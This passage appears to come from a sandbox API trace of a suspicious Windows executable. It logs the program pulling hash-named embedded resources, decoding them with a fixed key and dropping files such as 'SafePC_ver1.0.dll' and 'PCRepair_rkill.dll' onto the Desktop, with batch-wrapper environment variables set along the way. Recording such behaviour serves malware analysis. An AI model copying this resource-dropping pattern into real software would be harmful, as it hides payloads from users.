(_String="C:\\Users\\FD1HVy\\Desktop\\SAFEPC~1.DLL") returned 0x24 [0077.379] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a6a0 | out: hHeap=0x2a60000) returned 1 [0077.380] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6abc8 | out: hHeap=0x2a60000) returned 1 [0077.380] GetLastError () returned 0x0 [0077.380] SetLastError (dwErrCode=0x0) [0077.380] wcslen (_String="b2eincfile") returned 0xa [0077.380] GetLastError () returned 0x0 [0077.380] SetLastError (dwErrCode=0x0) [0077.380] GetLastError () returned 0x0 [0077.380] SetLastError (dwErrCode=0x0) [0077.380] SetEnvironmentVariableW (lpName="b2eincfile4", lpValue="C:\\Users\\FD1HVy\\Desktop\\SAFEPC~1.DLL") returned 1 [0077.380] GetLastError () returned 0x0 [0077.380] SetLastError (dwErrCode=0x0) [0077.380] GetLastError () returned 0x0 [0077.380] SetLastError (dwErrCode=0x0) [0077.380] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll") returned 0x29 [0077.380] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5c) returned 0x2a6a2f8 [0077.380] GetLastError () returned 0x0 [0077.380] SetLastError (dwErrCode=0x0) [0077.380] GetLastError () returned 0x0 [0077.381] SetLastError (dwErrCode=0x0) [0077.381] GetLastError () returned 0x0 [0077.381] SetLastError (dwErrCode=0x0) [0077.381] GetLastError () returned 0x0 [0077.381] SetLastError (dwErrCode=0x0) [0077.381] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a911d0 [0077.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AES256Encrypt.256", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0077.381] malloc (_Size=0x13) returned 0x1121150 [0077.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AES256Encrypt.256", cchWideChar=18, lpMultiByteStr=0x1121150, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AES256Encrypt.256", lpUsedDefaultChar=0x0) returned 18 [0077.381] free (_Block=0x1121150) [0077.381] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.381] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a228, Size=0x5a) returned 0x2a6a568 [0077.381] GetLastError () returned 0x0 [0077.381] SetLastError (dwErrCode=0x0) [0077.381] GetLastError () returned 0x0 [0077.381] SetLastError (dwErrCode=0x0) [0077.382] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a638, Size=0x5a) returned 0x2a6a3c8 [0077.382] FindResourceW (hModule=0x400000, lpName="F1C8CD92E6C1AD1F5E04F49275BB1E820969B32D", lpType=0xa) returned 0x0 [0077.382] FindResourceW (hModule=0x400000, lpName="D23B969028E1BB57294F40E5F1DA1C6E29DC8C1F", lpType=0xa) returned 0x8593b0 [0077.382] LoadResource (hModule=0x400000, hResInfo=0x8593b0) returned 0xc36acc [0077.382] SizeofResource (hModule=0x400000, hResInfo=0x8593b0) returned 0x8866 [0077.382] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x8866) returned 0x298aa68 [0077.382] FreeResource (hResData=0xc36acc) returned 0 [0077.382] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x298aa68) returned 0x8866 [0077.382] wcslen (_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0077.382] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a687f0 [0077.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0077.382] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x10e53f0 [0077.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x10e53f0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0077.382] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e53f0) returned 0x21 [0077.382] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a911d0 [0077.382] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a915f0 [0077.383] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.383] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911d0 [0077.383] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a915f0 | out: hHeap=0x2a90000) returned 1 [0077.383] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911f8 [0077.383] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e53f0 | out: hHeap=0x10e0000) returned 1 [0077.383] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a687f0 | out: hHeap=0x2a60000) returned 1 [0077.383] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.383] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911f8 | out: hHeap=0x2a90000) returned 1 [0077.383] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x13800) returned 0x29932d8 [0077.385] GetLastError () returned 0x0 [0077.385] SetLastError (dwErrCode=0x0) [0077.385] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0077.385] wcslen (_String="\\") returned 0x1 [0077.385] wcslen (_String="AES256Encrypt.256") returned 0x11 [0077.385] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a5d0, Size=0x5c) returned 0x2a6a360 [0077.385] malloc (_Size=0x1bcc) returned 0x11224f0 [0077.386] free (_Block=0x11224f0) [0077.386] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256") returned 0x29 [0077.386] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5c) returned 0x2a6a158 [0077.386] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256") returned 0x29 [0077.386] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5c) returned 0x2a6a290 [0077.386] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.386] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256" (normalized: "c:\\users\\fd1hvy\\desktop\\aes256encrypt.256"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.386] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.386] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a290 | out: hHeap=0x2a60000) returned 1 [0077.386] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.386] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256" (normalized: "c:\\users\\fd1hvy\\desktop\\aes256encrypt.256"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.387] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.387] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fe68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19fe68*=0) returned 0x0 [0077.387] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe4c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe4c*=0x0, lpOverlapped=0x0) returned 1 [0077.387] WriteFile (in: hFile=0x7c, lpBuffer=0x29932d8*, nNumberOfBytesToWrite=0x13800, lpNumberOfBytesWritten=0x19fe60, lpOverlapped=0x0 | out: lpBuffer=0x29932d8*, lpNumberOfBytesWritten=0x19fe60*=0x13800, lpOverlapped=0x0) returned 1 [0077.437] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe7c*=0x0, lpOverlapped=0x0) returned 1 [0077.437] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.437] CloseHandle (hObject=0x7c) returned 1 [0077.441] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.441] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a158 | out: hHeap=0x2a60000) returned 1 [0077.441] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x29932d8 | out: hHeap=0x10e0000) returned 1 [0077.442] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256") returned 0x29 [0077.442] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5c) returned 0x2a6a498 [0077.442] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.442] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256" (normalized: "c:\\users\\fd1hvy\\desktop\\aes256encrypt.256"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.442] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.442] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.442] CloseHandle (hObject=0x7c) returned 1 [0077.442] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.443] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a498 | out: hHeap=0x2a60000) returned 1 [0077.443] GetLastError () returned 0x0 [0077.443] SetLastError (dwErrCode=0x0) [0077.443] GetLastError () returned 0x0 [0077.443] SetLastError (dwErrCode=0x0) [0077.443] GetLastError () returned 0x0 [0077.443] SetLastError (dwErrCode=0x0) [0077.443] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256") returned 0x29 [0077.443] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5c) returned 0x2a6a290 [0077.443] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x10e53f0 [0077.443] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256", lpszShortPath=0x10e53f0, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop\\AES256~1.256") returned 0x24 [0077.444] GetLastError () returned 0x0 [0077.444] SetLastError (dwErrCode=0x0) [0077.444] GetLastError () returned 0x0 [0077.444] SetLastError (dwErrCode=0x0) [0077.444] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x52) returned 0x2a6abc8 [0077.444] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e53f0 | out: hHeap=0x10e0000) returned 1 [0077.444] GetLastError () returned 0x0 [0077.444] SetLastError (dwErrCode=0x0) [0077.444] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\AES256~1.256") returned 0x24 [0077.444] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a290 | out: hHeap=0x2a60000) returned 1 [0077.444] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6abc8 | out: hHeap=0x2a60000) returned 1 [0077.444] GetLastError () returned 0x0 [0077.444] SetLastError (dwErrCode=0x0) [0077.444] wcslen (_String="b2eincfile") returned 0xa [0077.444] GetLastError () returned 0x0 [0077.444] SetLastError (dwErrCode=0x0) [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.445] SetEnvironmentVariableW (lpName="b2eincfile5", lpValue="C:\\Users\\FD1HVy\\Desktop\\AES256~1.256") returned 1 [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.445] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256") returned 0x29 [0077.445] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5c) returned 0x2a6a500 [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.445] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a911d0 [0077.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PCRepair_rkill.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0077.445] malloc (_Size=0x14) returned 0x1121150 [0077.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PCRepair_rkill.dll", cchWideChar=19, lpMultiByteStr=0x1121150, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PCRepair_rkill.dll", lpUsedDefaultChar=0x0) returned 19 [0077.446] free (_Block=0x1121150) [0077.446] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.446] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a568, Size=0x5a) returned 0x2a6a430 [0077.446] GetLastError () returned 0x0 [0077.446] SetLastError (dwErrCode=0x0) [0077.446] GetLastError () returned 0x0 [0077.446] SetLastError (dwErrCode=0x0) [0077.446] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a3c8, Size=0x5a) returned 0x2a6a638 [0077.446] FindResourceW (hModule=0x400000, lpName="A87C727E59FA7712A6A08342CBB9C1CF4A385053", lpType=0xa) returned 0x0 [0077.446] FindResourceW (hModule=0x400000, lpName="350583A4FC1C9BBC24380A6A2177AF95E727C78A", lpType=0xa) returned 0x859298 [0077.446] LoadResource (hModule=0x400000, hResInfo=0x859298) returned 0xafc9f0 [0077.446] SizeofResource (hModule=0x400000, hResInfo=0x859298) returned 0xd21c2 [0077.446] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0xd21c2) returned 0x2da7020 [0077.463] FreeResource (hResData=0xafc9f0) returned 0 [0077.463] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x2da7020) returned 0xd21c2 [0077.463] wcslen (_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0077.463] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a68320 [0077.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0077.463] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x10e53f0 [0077.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x10e53f0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0077.463] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e53f0) returned 0x21 [0077.463] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a911d0 [0077.463] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a915f0 [0077.476] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.476] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911d0 [0077.476] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a915f0 | out: hHeap=0x2a90000) returned 1 [0077.476] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911f8 [0077.477] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e53f0 | out: hHeap=0x10e0000) returned 1 [0077.477] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68320 | out: hHeap=0x2a60000) returned 1 [0077.477] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.477] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911f8 | out: hHeap=0x2a90000) returned 1 [0077.477] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x1b81d0) returned 0x2e8e020 [0077.531] GetLastError () returned 0x0 [0077.531] SetLastError (dwErrCode=0x0) [0077.531] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0077.531] wcslen (_String="\\") returned 0x1 [0077.531] wcslen (_String="PCRepair_rkill.dll") returned 0x12 [0077.531] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a360, Size=0x5e) returned 0x2a6a708 [0077.531] malloc (_Size=0x1bcc) returned 0x11224f0 [0077.568] free (_Block=0x11224f0) [0077.568] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll") returned 0x2a [0077.568] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5e) returned 0x2a6a498 [0077.568] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll") returned 0x2a [0077.568] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5e) returned 0x2a6a7d8 [0077.568] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.568] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\pcrepair_rkill.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.568] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.568] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a7d8 | out: hHeap=0x2a60000) returned 1 [0077.568] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.568] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\pcrepair_rkill.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.569] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.569] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fe68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19fe68*=0) returned 0x0 [0077.569] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe4c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe4c*=0x0, lpOverlapped=0x0) returned 1 [0077.569] WriteFile (in: hFile=0x7c, lpBuffer=0x2e8e020*, nNumberOfBytesToWrite=0x1b81d0, lpNumberOfBytesWritten=0x19fe60, lpOverlapped=0x0 | out: lpBuffer=0x2e8e020*, lpNumberOfBytesWritten=0x19fe60*=0x1b81d0, lpOverlapped=0x0) returned 1 [0077.765] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe7c*=0x0, lpOverlapped=0x0) returned 1 [0077.765] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.765] CloseHandle (hObject=0x7c) returned 1 [0077.956] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.956] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a498 | out: hHeap=0x2a60000) returned 1 [0077.956] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x2e8e020 | out: hHeap=0x10e0000) returned 1 [0077.964] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll") returned 0x2a [0077.964] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5e) returned 0x2a6a158 [0077.964] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.965] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\pcrepair_rkill.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.965] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.965] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.965] CloseHandle (hObject=0x7c) returned 1 [0077.965] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.965] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a158 | out: hHeap=0x2a60000) returned 1 [0077.965] GetLastError () returned 0x0 [0077.965] SetLastError (dwErrCode=0x0) [0077.965] GetLastError () returned 0x0 [0077.965] SetLastError (dwErrCode=0x0) [0077.965] GetLastError () returned 0x0 [0077.965] SetLastError (dwErrCode=0x0) [0077.965] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll") returned 0x2a [0077.965] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5e) returned 0x2a6a5d0 [0077.965] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x10e53f0 [0077.965] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll", lpszShortPath=0x10e53f0, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop\\PCREPA~1.DLL") returned 0x24 [0077.966] GetLastError () returned 0x0 [0077.966] SetLastError (dwErrCode=0x0) [0077.966] GetLastError () returned 0x0 [0077.966] SetLastError (dwErrCode=0x0) [0077.966] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x52) returned 0x2a6abc8 [0077.966] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e53f0 | out: hHeap=0x10e0000) returned 1 [0077.966] GetLastError () returned 0x0 [0077.966] SetLastError (dwErrCode=0x0) [0077.966] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\PCREPA~1.DLL") returned 0x24 [0077.966] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a5d0 | out: hHeap=0x2a60000) returned 1 [0077.966] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6abc8 | out: hHeap=0x2a60000) returned 1 [0077.966] GetLastError () returned 0x0 [0077.966] SetLastError (dwErrCode=0x0) [0077.966] wcslen (_String="b2eincfile") returned 0xa [0077.966] GetLastError () returned 0x0 [0077.966] SetLastError (dwErrCode=0x0) [0077.966] GetLastError () returned 0x0 [0077.966] SetLastError (dwErrCode=0x0) [0077.967] SetEnvironmentVariableW (lpName="b2eincfile6", lpValue="C:\\Users\\FD1HVy\\Desktop\\PCREPA~1.DLL") returned 1 [0077.967] GetLastError () returned 0x0 [0077.967] SetLastError (dwErrCode=0x0) [0077.967] GetLastError () returned 0x0 [0077.967] SetLastError (dwErrCode=0x0) [0077.967] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll") returned 0x2a [0077.967] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5e) returned 0x2a6a770 [0077.967] GetLastError () returned 0x0 [0077.967] SetLastError (dwErrCode=0x0) [0077.967] GetLastError () returned 0x0 [0077.967] SetLastError (dwErrCode=0x0) [0077.967] GetLastError () returned 0x0 [0077.967] SetLastError (dwErrCode=0x0) [0077.967] GetLastError () returned 0x0 [0077.967] SetLastError (dwErrCode=0x0) [0077.967] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a911d0 [0077.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hexadecimal_Calculator.ns", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0077.967] malloc (_Size=0x1b) returned 0x1121150 [0077.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hexadecimal_Calculator.ns", cchWideChar=26, lpMultiByteStr=0x1121150, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hexadecimal_Calculator.ns", lpUsedDefaultChar=0x0) returned 26 [0077.967] free (_Block=0x1121150) [0077.968] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.968] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a430, Size=0x5a) returned 0x2a6a228 [0077.968] GetLastError () returned 0x0 [0077.968] SetLastError (dwErrCode=0x0) [0077.968] GetLastError () returned 0x0 [0077.968] SetLastError (dwErrCode=0x0) [0077.968] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a638, Size=0x5a) returned 0x2a6a6a0 [0077.968] FindResourceW (hModule=0x400000, lpName="B5ED66F69DDA4CA62FA8C52D19F4943693A992A1", lpType=0xa) returned 0x0 [0077.968] FindResourceW (hModule=0x400000, lpName="1A299A3963494F91D25C8AF26AC4ADD96F66DE5B", lpType=0xa) returned 0x859248 [0077.968] LoadResource (hModule=0x400000, hResInfo=0x859248) returned 0xaebe90 [0077.968] SizeofResource (hModule=0x400000, hResInfo=0x859248) returned 0x311a [0077.968] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x311a) returned 0x10e53f0 [0077.968] FreeResource (hResData=0xaebe90) returned 0 [0077.968] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e53f0) returned 0x311a [0077.968] wcslen 